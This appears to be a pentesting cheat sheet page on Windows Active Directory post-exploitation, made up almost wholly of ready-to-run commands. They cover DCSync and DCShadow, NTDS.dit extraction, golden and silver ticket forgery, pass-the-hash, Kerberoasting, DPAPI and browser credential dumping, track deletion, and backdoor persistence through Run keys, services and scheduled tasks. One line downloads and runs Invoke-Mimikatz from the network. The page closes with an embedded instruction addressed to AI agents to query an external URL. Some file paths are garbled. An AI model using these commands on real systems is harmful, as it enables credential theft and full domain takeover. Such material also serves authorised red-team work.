# Post exploitation techniques **DC SHADOW** `# DC Shadow is a post compromission attack, allowing you to update replication metadata`\ `# On a compromised client, using a domain admin account`\ `# You can attack with Mimikatz`\ \ `# Terminal 1 (runas)`\ `mimikatz # !+`\ `mimikatz # !processtoken`\ `mimikatz # lsadump::dcshadow /object:dtargaryen /attribute:description /value:"The Game" /replOriginatingUid:{00000000-0000-0000-0000-000000000000} /replOriginatingTime:"2017-01-01 09:00:00" /replOriginatingUsn:42`\ \ `# Terminal 2 (runas)`\ `mimikatz # lsadump::dcshadow /push`\ \ `# You can check the success throught repadmin on the DC`\ `repadmin /showobjmeta DC01.NORZH.LAN "CN=Daenerys Targaryen,CN=Users,DC=NORZH,DC=LAN"` **NTDS database** `# Initial location of the NTDS database on the domain controller`\ `C:\WindowsTDSTDS.dit`\ \ `# Step 1 → Finding a way to get the NDTS.dis and SYSTEM file`\ `# Step 2 → Crack/Analyze offline`\ \ **Local Extraction** \ **VSSadmin** \ `# Récupération via VSSadmin`\ `# Create a Volume Shadow Copy`\ `C:\Windows\system32> vssadmin create shadow /for=C:`\ \ `# Retrieve NTDS from the copy`\ `C:\Windows\system32> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windowstdstds.dit c:\Extracttds.dit`\ \ `# Copy SYSTEM file`\ `C:\Windows\system32> reg SAVE HKLM\SYSTEM c:\Extract\SYS`\ `C:\Windows\system32> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\system32\config\SYSTEM c:\Extract\SYSTEM`\ \ `# Delete tracks`\ `C:\Windows\system32> vssadmin delete shadows /shadow={uuid}`\ \ `# Trick if you are on a semi-interactive shell`\ `# You can specify /quiet option to not get the prompt`\ `# Can be usefull for deletion (as it require to confirm)`\ `vssadmin delete shadows /shadow={uuid} /quiet`\ \ **ntdsutil tool** \ `# ntdsutil is a builtin tool used to manage the AD`\ `# You can abuse it and create a backup of the ntds.dit file`\ `ntdsutil`\ `activate instance ntds`\ `ifm`\ `create full C:tdsutil`\ `quit`\ `quit`\ \ **DC Sync / Mimikatz** \ `# DC Sync is a less noisy way to extract users informations`\ `# It uses the DRS (Directory Replication Service)`\ \ `# Classic`\ `mimikatz # lsadump::dcsync /domain:domain.lan /all /csv`\ \ `# Specific user`\ `mimikatz # lsadump::dcsync /domain:domain.lan /user:test`\ \ **PowerSploit** \ `# PowerSploit contains a script using the volume shadow copy service`\ `Import-Module .\VolumeShadowCopyTools.ps1`\ `New-VolumeShadowCopy -Volume C:\`\ `Get-VolumeShadowCopy`\ \ `# Also possible through a meterpreter session`\ `powershell_shell`\ `New-VolumeShadowCopy -Volume C:\`\ `Get-VOlumeShadowCopy`\ \ **Invoke-DCSync** \ `# Powershell script`\ `# Leverages PowerView, Invoke-ReflectivePEInjection and a DLL wrapper of PowerKatz`\ `Invoke-DCSync`\ \ `# Get other format (user:id:lm:ntlm)`\ `Invoke-DCSync -PWDumpFormat`\ `# It is also possible through a meterpreter session`\ \ **Nishang** `# Nishang is a post exploitation framework allowing attacker to perform attacks`\ `# You can use the Copy-VSS script to get NTDS.dit, SAM and SYSTEM files`\ `Import-Module .\Copy-VSS.ps1`\ `Copy-VSS`\ `Copy-VSS -DestinationDir C:\ShadowCopy\`\ \ `# You can also use them throught a meterpretrer session by loading the powershell extension`\ `load powershell`\ `powershell_import /root/Copy-VSS.ps1`\ `powershell_execute Copy-VSS`\ \ `# Also possible to establish a direct connection`\ `powershell_shell`\ `PS > Copy-VSS`\ `PS > Copy-VSS -DestinationDir C:inja`\ \ **Remote Extraction** \ **CrackMapExec** \ `crackmapexec xxx.xxx.xxx.xxx -u login -p password -d domain --ntds drsuapi`\ \ **WMI - Remote**\ `# It is possible to remotely extract the NTDS database using WMI and VSSADMIN`\ `wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c vssadmin create shadow /for=C: 2>&1"`\ `wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1"`\ `wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM\ C:\temp\SYSTEM.hive 2>&1"`\ \ \ **Impacket** \ `$ python secretsdump.py -history -user-status -just-dc-user Administrateur -just-dc-ntlm foo.local/administrateur:P4ssw0rd\!@DC1.FOO.LOCAL`\ \ `$ python secretsdump.py -history -user-status -just-dc-user krbtgt -just-dc-ntlm foo.local/administrateur:P4ssw0rd\!@DC1.FOO.LOCAL`\ \ **NTDS Extraction and analysis** \ `# Impacket provides a usefull script to do that (decrypt copied files)`\ `impacket-secretsdump -system /root/SYSTEM -ntds /root/ntds.dit DOMAIN`\ \ `# Also possible to dump it remotely by using the computer account and its hash`\ `impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1`\ \ `# Extraction is also possible using NTDSDumpEx`\ `NTDSDumpEx.exe -d ntds.dit -s SYSTEM.hive`\ \ `# Or adXtract`\ `./adXtract.sh /root/ntds.dit /root/SYSTEM pentestlab`\ \ **Empire** \ `# Empire has 2 modules you can use to retrieve hashes through DCSync`\ `usemodule credentials/mimikatz/dcsync_hashdump`\ `usemodule credentials/mimikatz/dcsync` **Ticket generation from Linux** \ `# Generate a ticket or convert it (kekeo) to ccache format`\ `$ ticketer.py -nthash -domain-sid -domain `\ \ `# Export the path in the right variable`\ `$ export KRB5CCNAME=/tmp/ticket.ccache`\ `$ klist`\ \ `# Exec and use the ticket`\ `$ /impacket/examples/psexec.py -k -n -debug DOMAIN/user@host`\ \ `# Dump NTDS`\ `$ proxychains secretsdump.py -k -no-pass qsec@DCFIL.PRAMAFIL.CORP -use-vss`\ \ **Golden Ticket** \ `# Golden Ticket`\ `> Nom du compte administrateur (Administrateur)`\ `> Nom complet du domaine (domain.local)`\ `> SID du domaine (S-1-5-21-1723555596-1415287819-2705645101) [whoami /user]`\ `> Hash NTLM du compte krbtgt (6194bd1a5bf3ecd542e8aac9860bddf0)`\ \ `mimikatz # privilege:debug`\ `mimikatz # lsadump::lsa /inject /name:krbtgt`\ \ `mimikatz # kerberos::golden /admin:Administrateur /domain:domain.local /sid:S-1-5-21-1723555596-1415287819-2705645101 /krbtgt:6194bd1a5bf3ecd542e8aac9860bddf0 /ticket:domain.local.kirbi /id:500 /ptt`\ \ `Use :`\ `mimikatz # kerberos::ptt domain.local.kirbi`\ `mimikatz # kerberos::list`\ \ `# Resource`\ `https://twitter.com/mpgn_x64/status/1241688547037532161`\ \ `# Golden ticket and access denied ?`\ `# from cmd (elevated)`\ `> mimikatz kerberos::golden`\ `> klist add_bind `\ `> psexec \\dc\ cmd`\ \ **Playing with tickets on Windows** \ `# Sessions en cours`\ `mimikatz # sekurlsa::logonpasswords`\ \ `# Ticket TGT`\ `# Dump SPN`\ `PS C:\> Find-PSServiceAccounts -DumpSPN`\ `Discovering service account SPNs in the AD Domain foo.local`\ `svcSQLServ/pc1.foo.local:1433`\ \ `# Download Mimikatz`\ `PS C:\> Invoke-Expression (New-Object Net.Webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')`\ `PS C:\> Invoke-Mimikatz`\ `mimikatz(powershell) # sekurlsa::logonpasswords`\ `ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)`\ \ `# Lister les tickets actifs ou les purger`\ `PS C:\> Invoke-Mimikatz -Command '"kerberos::purge"'`\ `PS C:\> Invoke-Mimikatz -Command '"kerberos::list"'`\ `PS C:\> klist`\ \ `# Demander un ticket`\ `PS C:\> Add-Type -AssemblyName System.IdentityModel`\ `PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "svcSQLServ/pc1.foo.local:1433"`\ \ `# Exporter un ticket`\ `mimikatz # kerberos::list /export`\ \ `# Crack Ticket`\ `python tgsrepcrack.py wordlist.txt ticket.kirbi` **Tips** \ `# Getting passwords from browser memory`\ `procdump.exe -ma firefox_pid`\ `strings.exe firefox.dmp | findstr /i "Passwd="`\ \ **Scavenger** \ `# Scavenger is a tool used above CrackMapExec to automate the process`\ `# of looking for sensitive files and informations during Internal Pentest`\ `python3 ./scavenger.py smb -t 10.0.0.10 -u administrator -p Password123 -d test.local`\ \ `$ python3 ./scavenger.py smb --target iplist --username administrator --password Password123 --domain test.local --overwrite`\ \ **WinSCP** \ `# WinSCP is potentially exploitable in the registry if not using a master password`\ `# You can manually request the key`\ `reg.exe query "HKEY_CURRENT_USER\Software\Martin Prikry\WinSCP 2"`\ `reg.exe query "HKEY_CURRENT_USER\Software\Martin Prikry\WinSCP 2\Sessions\username@ip"`\ \ `# Then let s recover the password using the following binary`\ `https://github.com/anoopengineer/winscppasswd/releases`\ `.\winscppasswd ip user`\ \ `# Automatisation using CrackMapExec`\ `# Using invoke_sessiongopher you can recover informations about PuTTY, WinSCP, FileZilla, SuperPuTTY or RDP`\ `crackmapexec smb ip -u "user" -p "password" -d "domain" -M invoke_sessiongopher`\ \ **Snaffler**\ `https://github.com/SnaffCon/Snaffler`\ \ `# Snaffler is a tool made to automate information gathering on windows and domains`\ `# it focuses location such as network shares etc.`\ \ `snaffler.exe -s -o snaffler.log`\ \ `-o Enables outputting results to a file. You probably want this if youre not using -s. e.g. -o C:\usershing\snaffler.log`\ \ `-s Enables outputting results to stdout as soon as theyre found. You probably want this if you re not using -o.`\ \ `-v Controls verbosity level, options are Trace (most verbose), Debug (less verbose), Info (less verbose still, default), and Data (results only). e.g -v debug`\ \ `-m Enables and assigns an output dir for snaffler to automatically take a copy of (or Snaffle... if you will) any found files that it likes.`\ \ `-l Maximum size of files (in bytes) to Snaffle. Defaults to 10000000, which is about 10MB.`\ \ `-i Disables computer and share discovery, requires a path to a directory in which to perform file discovery.`\ \ `-d Domain to search for computers to search for shares on to search for files in. Easy.`\ \ `-c Domain controller to query for the list of domain computers.`\ \ `-r The maximum size file (in bytes) to search inside for interesting strings. Defaults to 500k.`\ \ `-j How many bytes of context either side of found strings in files to show, e.g. -j 200`\ \ `-z Path to a config file that defines all of the above, and much much more! See below for more details. Give it -z generate to generate a sample config file called .\default.toml.`\ \ \ **DonPAPI**\ `https://github.com/login-securite/DonPAPI`\ `# Dumping revelant information on compromised targets without AV detection`\ `# With a user password, or the domain PVK we can unprotect the user's DPAPI secrets.`\ \ `# Currently gathered info`\ `# - Windows credentials (Taskscheduled credentials & a lot more)`\ `# - Windows Vaults`\ `# - Windows RDP credentials`\ `# - AdConnect (still require a manual operation)`\ `# - Wifi key`\ `# - Intenet explorer Creentials`\ `# - Chrome cookies & credentials`\ `# - Firefox cookies & credentials`\ `# - VNC passwords`\ `# - mRemoteNG password (with default config)`\ \ `# Classic launch`\ `DonPAPI.py domain/user:passw0rd@target`\ \ `# Using hash`\ `DonPAPI.py --hashes : domain/user@target`\ \ `# Using Kerberos or local auth`\ `DonPAPI.py -k domain/user@target`\ `DonPAPI.py -local_auth user@target`\ \ `# If user has LAPS reading privilege`\ `DonPAPI.py -laps domain/user:passw0rd@target`\ \ `# If you are domain admin, you can dump the domain backup key using impacket`\ `# Then you can use the PVK (backup key) to dump all users secrets`\ `dpapi.py backupkeys --export -t domain/user:passw0rd@target_dc_ip`\ `python DonPAPI.py -pvk domain_backupkey.pvk domain/user:passw0rd@domain_network_list`
**PERSISTENCE** **Resources** \ `https://rastamouse.me/2018/03/a-view-of-persistence/`\ \ **Userland & Elevated** \ `# Userland techniques`\ \ `# HKCU`\ `# Create a REG_SZ value in the Run key within HKCU\Software\Microsoft\Windows. (Other keys are available).`\ `Value name: Backdoor`\ `Value data: C:\Usersasta\AppData\Localemp\backdoor.exe`\ \ `# Start-up`\ `# Create a batch script in the user startup folder.`\ `PS C:\> gc C:\Usersasta\AppDataoaming\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat`\ `start /b C:\Usersasta\AppData\Localemp\backdoor.exe`\ \ `# Scheduled Tasks`\ `PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe"`\ `PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta"`\ `PS C:\> $P = New-ScheduledTaskPrincipal "Rasta"`\ `PS C:\> $S = New-ScheduledTaskSettingsSet`\ `PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S`\ `PS C:\> Register-ScheduledTask Backdoor -InputObject $D`\ \ `# Powershell profiles`\ `# You can backdoor the powershell profile`\ `PS C:\> Test-Path $profile`\ `False`\ \ `PS C:\> New-Item -Path $profile -Type File –Force`\ \ `Directory: C:\Usersasta\Documents\WindowsPowerShell`\ \ `Mode LastWriteTime Length Name`\ `---- ------------- ------ ----`\ `-a---- 22/03/2018 12:42 0 Microsoft.PowerShell_profile.ps1`\ \ `PS C:\> $string = 'Start-Process "cmd.exe"'`\ `PS C:\> $string | Out-File -FilePath "C:\Users\Rasta\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1" -Append`\ \ `# Elevated techniques`\ \ `# HKLM`\ `# Similar to HKCU. Create a REG_SZ value in the Run key within HKLM\Software\Microsoft\Windows`\ `Value name: Backdoor`\ `Value data: C:\Windowsemp\backdoor.exe`\ \ `# Services`\ `# Create a service that will start automatically or on-demand.`\ `PS C:\> New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here."`\ \ `# Scheduled Tasks`\ `PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Windows\Temp\backdoor.exe"`\ `PS C:\> $T = New-ScheduledTaskTrigger -Daily -At 9am`\ `PS C:\> $P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest`\ `PS C:\> $S = New-ScheduledTaskSettingsSet`\ `PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S`\ `PS C:\> Register-ScheduledTask Backdoor -InputObject $D`\ \ **Maintaining Privilege** \ `# Steal passwords and use them with runas`\ `runas /netonly /user:FS01\Administrator cmd`\ \ `# If you can’t get passwords, use NTLM hashes with techniques such as Pass-the-Hash or psexec.`\ `# Both domain accounts and local accounts can work.`\ `mimikatz> sekurlsa::pth /user:Administrator /domain:FS01 /rc4:fc525c9683e8fe067095ba2ddc971889 /ptt`\ \ `# Adding new local users can be a method to get back into machines`\ `# Administrators local group is a solution, but you can also use the following groups`\ `Remote Desktop Users`\ `Remote Management Users`\ `Backup Operators`\ \ `# With the NTLM hash of a computer account, silver tickets can be used to regain local admin privileges via the CIFS service.`\ `mimikatz> kerberos::golden /user:Administrator /domain:testlab.local /sid:S-1-5-21-1516486103-3973840447-1748718438 /target:fs01 /rc4:47b1d9d581f29b3b43845692bd4a0322 /service:cifs /ptt`\ \ `# Golden tickets can be used to forge access to any service in the domain.`\ `mimikatz> kerberos::golden /user:Administrator /domain:testlab.local /sid:S-1-5-21-1516486103-3973840447-1748718438 /rc4:9063b8edb3d04ed734edd49e5b0adef3 /ptt` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://morgan-bin-bash.gitbook.io/pentesting/post-exploitation-techniques.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.